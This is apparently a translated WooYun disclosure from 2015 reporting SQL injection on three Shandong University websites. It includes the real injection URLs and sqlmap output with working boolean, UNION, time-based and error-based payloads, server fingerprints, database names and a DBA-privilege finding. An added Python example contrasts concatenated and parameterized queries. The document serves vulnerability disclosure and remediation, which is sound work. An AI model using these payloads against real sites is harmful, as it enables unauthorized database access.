Vulnerability summary

Defect ID: wooyun-2015-0165109

Title: SQL injection in multiple Shandong University sites

Vendor: 山东大学 (Shandong University)

Author: 路人甲

Submitted: 2015-12-28 13:00

Fixed: 2016-02-09 23:29

Published: 2016-02-09 23:29

Vulnerability type: SQL injection

Severity: Medium

Self-assessed Rank: 10

Status: Confirmed by vendor

Source: http://www.wooyun.org. For questions or help contact [email protected]


Vulnerability details

Disclosure timeline:

2015-12-28: Details sent to the vendor; awaiting vendor handling
2015-12-29: Vendor confirmed; details disclosed to the vendor only
2016-01-08: Details disclosed to core white hats and domain experts
2016-01-18: Details disclosed to regular white hats
2016-01-28: Details disclosed to intern white hats
2016-02-09: Details disclosed to the public

Brief description:

SQL injection in multiple Shandong University sites

Detailed description:

1. Injection point: http://www.hglx.sdu.edu.cn/article.php?id=764

GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] n
sqlmap identified the following injection points with a total of 160 HTTP(s) requests:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=764 AND 5432=5432
Type: UNION query
Title: MySQL UNION query (NULL) - 37 columns
Payload: id=-4328 UNION ALL SELECT 16,16,16,16,16,16,16,16,CONCAT(0x7176706271,0x5744684c69474559504d,0x7178717a71),16,16,16,16,16,16,16,16,16,16,16,16,16,16,16,16,16,16,16,16,16,16,16,16,16,16,16,16#
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind (SELECT)
Payload: id=764 AND (SELECT * FROM (SELECT(SLEEP(100)))PgMm)
---
[09:20:24] [INFO] the back-end DBMS is MySQL
web server operating system: Windows 2008 or Vista
web application technology: PHP 5.2.6, ASP.NET, Microsoft IIS 7.0
back-end DBMS: MySQL 5.0.11


web server operating system: Windows 2008 or Vista
web application technology: PHP 5.2.6, ASP.NET, Microsoft IIS 7.0
back-end DBMS: MySQL 5.0.11
[09:20:38] [INFO] fetching current user
sqlmap got a 302 redirect to 'http://www.hglx.sdu.edu.cn:80/index.php'. Do you want to follow? [Y/n] n
current user: 'sq_hanguoliuxue@%'
available databases [2]:
[*] information_schema
[*] sq_hanguoliuxue


1.png

2.png


Proof of vulnerability:

2. Injection point: http://yinshi.wh.sdu.edu.cn/show.php?filed_id=72
yinshi.wh.sdu.edu.cn/show.php?filed_id=-72 UNION SELECT ALL 1,2,3,4,5,6,7,8,9

GET parameter 'filed_id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] n
sqlmap identified the following injection points with a total of 69 HTTP(s) requests:
---
Parameter: filed_id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: filed_id=72 AND 3076=3076
Type: UNION query
Title: Generic UNION query (NULL) - 9 columns
Payload: filed_id=-7442 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,CONCAT(0x716a707171,0x68597a6370495452576c,0x7170717171),NULL,NULL,NULL--
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind (SELECT)
Payload: filed_id=72 AND (SELECT * FROM (SELECT(SLEEP(100)))pDsO)
---
[09:13:30] [INFO] the back-end DBMS is MySQL
web server operating system: Linux CentOS 5.10
web application technology: Apache 2.2.3, PHP 5.2.17
back-end DBMS: MySQL 5.0.11


web server operating system: Linux CentOS 5.10
web application technology: Apache 2.2.3, PHP 5.2.17
back-end DBMS: MySQL 5.0.11
[09:13:49] [INFO] fetching current user
current user: 'yinshi@localhost'
web server operating system: Linux CentOS 5.10
web application technology: Apache 2.2.3, PHP 5.2.17
back-end DBMS: MySQL 5.0.11
[09:14:01] [INFO] fetching database names
[09:14:03] [INFO] the SQL query used returns 3 entries
[09:14:04] [INFO] retrieved: information_schema
[09:14:05] [INFO] retrieved: test
[09:14:06] [INFO] retrieved: yinshi
available databases [3]:
[*] information_schema
[*] test
[*] yinshi


1.png

2.png

3.png


3. Injection point: http://sv13.wljy.sdu.edu.cn:1500/listArticle.aspx?ColumnId=1&PageNo=1

URI parameter '#1*' is vulnerable. Do you want to keep testing the others (if any)? [y/N] n
sqlmap identified the following injection points with a total of 36 HTTP(s) requests:
---
Parameter: #1* (URI)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: http://sv13.wljy.sdu.edu.cn:1500/listArticle.aspx?ColumnId=1' AND 8948=8948 AND 'tLIT'='tLIT&PageNo=1
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: http://sv13.wljy.sdu.edu.cn:1500/listArticle.aspx?ColumnId=1' AND 3405=CONVERT(INT,(SELECT CHAR(113)+CHAR(98)+CHAR(98)+CHAR(112)+CHAR(113)+(SELECT (CASE WHEN (3405=3405) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(113)+CHAR(120)+CHAR(113)+CHAR(113))) AND 'KbrS'='KbrS&PageNo=1
---
[02:45:37] [INFO] testing Microsoft SQL Server
[02:45:42] [INFO] confirming Microsoft SQL Server
[02:46:04] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 6.0
back-end DBMS: Microsoft SQL Server 2005


available databases [1]:
[*] EntrolExam


DBA privileges

web server operating system: Windows 2003 or XP
web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 6.0
back-end DBMS: Microsoft SQL Server 2005
[02:57:21] [INFO] testing if current user is DBA
current user is DBA: True


1.png

2.png
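All three findings share one root cause: a request parameter is concatenated into the SQL text instead of being bound as a typed parameter. The following is an added example, not code from the report or from the affected sites; it assumes an in-memory SQLite database (the report's targets run MySQL and Microsoft SQL Server, but the concatenation defect and its fix are the same), a constructed `article` table standing in for an `article.php?id=` style endpoint, and a second constructed table that the endpoint should never expose. It replays the report's own boolean probe (`764 AND 5432=5432`) and a UNION probe against a vulnerable handler and a hardened one, so the difference in behaviour can be checked directly.

```python
import sqlite3


def make_db():
    """Constructed sample schema (assumption: SQLite, not the sites' real DBMS)."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE article (id INTEGER PRIMARY KEY, title TEXT, body TEXT);
        INSERT INTO article VALUES (764, 'Welcome', 'Public article text');
        -- Constructed table the article endpoint must never read from.
        CREATE TABLE site_config (k TEXT, v TEXT);
        INSERT INTO site_config VALUES ('admin_email', 'constructed@example.invalid');
    """)
    return conn


def fetch_article_vulnerable(conn, raw_id):
    """Mirrors the defect class in the report: the raw GET value is pasted
    into the statement, so SQL in the parameter becomes part of the query."""
    sql = "SELECT title, body FROM article WHERE id = " + raw_id
    return conn.execute(sql).fetchall()


def fetch_article_safe(conn, raw_id):
    """Hardened form: enforce the expected type, then bind the value as a
    parameter so the database never parses it as SQL."""
    try:
        article_id = int(raw_id)
    except ValueError:
        raise ValueError("id must be an integer") from None
    if article_id <= 0:
        raise ValueError("id must be positive")
    sql = "SELECT title, body FROM article WHERE id = ?"
    return conn.execute(sql, (article_id,)).fetchall()


def probe(handler):
    """Run the report's boolean probe and a UNION probe through a handler and
    return how many rows each produced (None means the input was rejected)."""
    conn = make_db()
    results = {}
    for label, raw_id in [
        ("normal", "764"),
        ("bool_true", "764 AND 5432=5432"),    # same shape as the report's payload
        ("bool_false", "764 AND 5432=5433"),
        ("union", "-4328 UNION ALL SELECT k, v FROM site_config"),
    ]:
        try:
            results[label] = len(handler(conn, raw_id))
        except ValueError:
            results[label] = None
    conn.close()
    return results


if __name__ == "__main__":
    print("vulnerable:", probe(fetch_article_vulnerable))
    print("hardened:  ", probe(fetch_article_safe))
```

In the vulnerable handler the true and false boolean probes return different row counts, which is exactly the signal sqlmap's boolean-based blind test keys on, and the UNION probe returns a row from the unrelated table. The hardened handler answers the legitimate request and rejects every probe before any SQL runs; the integer check is the cheap first line, parameter binding is the one that actually removes the bug, and the same two steps apply to the `filed_id` and `ColumnId` parameters in findings 2 and 3.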

Fix recommendation:

Copyright notice: please credit the source when republishing: 路人甲@乌云


Vulnerability response

Vendor response:

Severity: Medium

Vulnerability Rank: 6

Confirmed: 2015-12-29 09:44

Vendor reply:

Reported to the unit that owns the system

Latest status:

None yet